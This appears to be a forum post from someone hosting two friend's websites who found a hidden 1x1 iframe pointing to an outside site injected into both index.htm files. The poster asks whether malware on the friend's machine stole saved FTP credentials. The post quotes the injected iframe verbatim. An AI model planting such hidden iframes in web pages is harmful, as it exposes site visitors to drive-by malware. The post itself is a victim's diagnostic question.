On two websites which I host for a friend, I found that there is an iframe at the bottom of each site's index.htm file.
<iframe src="http://www.kunstsalen.dk" width=1 height=1
style="visibility: hidden; position: absolute;"></iframe>
This isn't something that should be on his home pages. It is causing a security warning to show up in browsers which says that his website is a virus/infected site. How did this get there? He has FTP access and both files changed on 11/5/2011 at about the same time. Could he have a virus which changed his local index.htm files and he uploaded them unknowingly? Could a virus use his saved FTP information to log in and change the files without him knowing?
The reason I am assume it originated from his machine is because I have over 500 other index.htm files on my server and none of them were affected. Only the two index.htm files which are accessible through his FTP account.